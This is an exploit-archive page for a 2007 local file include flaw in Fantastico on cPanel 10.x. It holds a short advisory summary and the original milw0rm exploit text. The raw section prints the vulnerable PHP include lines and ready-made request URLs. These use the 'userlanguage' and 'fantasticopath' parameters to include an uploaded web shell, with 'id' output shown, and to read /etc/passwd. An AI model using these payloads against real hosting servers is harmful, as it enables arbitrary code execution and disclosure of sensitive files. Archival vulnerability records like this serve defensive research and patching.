header-logo
Suggest Exploit
vendor:
Fantastico
by:
cyb3rt & 020
7.5
CVSS
HIGH
Local File Include
22
CWE
Product Name: Fantastico
Affected Version From: Cpanel 10.x
Affected Version To: Cpanel 10.x
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Fantastico In all Version Cpanel 10.x <= local File Include

The vulnerability allows an attacker to include local files on the server by manipulating the 'userlanguage' parameter in the 'load_language.php' script. This can be exploited to read sensitive files like 'passwd' or execute arbitrary PHP code by including a malicious file.

Mitigation:

The vendor should release a patch to fix the vulnerability. In the meantime, users can mitigate the risk by implementing proper input validation and sanitization techniques.
Source

Exploit-DB raw data:

##############################################################
Fantastico In all Version Cpanel 10.x <= local File Include

##############################################################to the
Note : Preparations php.ini in Cpanel  hypothetical and They also in
all WebServer

Must provide username  And pass  and login  :2082
To break the strongest protection   mod_security  & safe_mode:On  &
Disable functions :  All NONE



Vulnerable Code ( 1  ) :
 if(is_file($userlanguage))
   {
       include ( $userlanguage );

In

http://xx.com:2082/frontend/x/fantastico/includes/load_language.php



Exploit  1 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/home/user/shell.php

id
uid=32170(user) gid=32170(user) groups=32170(user)

Exploit  2 :
http://xx.com:2082/frontend/x/fantastico/includes/load_language.php?userlanguage=/etc/passwd

###################################################
Vulnerable Code ( 2  ) :

$localmysqlconfig=$fantasticopath . "/includes/mysqlconfig.local.php";
if (is_file($localmysqlconfig))
       {
       include($localmysqlconfig);

in
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php
And also many of the files of the program

Exploit :
First Create directory Let the name (/includes/)
and upload Shell.php  in (/includes/) Then  rename
mysqlconfig.local.php       D:

:::xploit::::
http://xx.com:2082/frontend/x/fantastico/includes/mysqlconfig.php?fantasticopath=/home/user/



###################################################


Discoverd By : cyb3rt & 020
###################################################

Special Greetings :_ Tryag-Team  &  4lKaSrGoLd3n-Team
###################################################

# milw0rm.com [2007-03-11]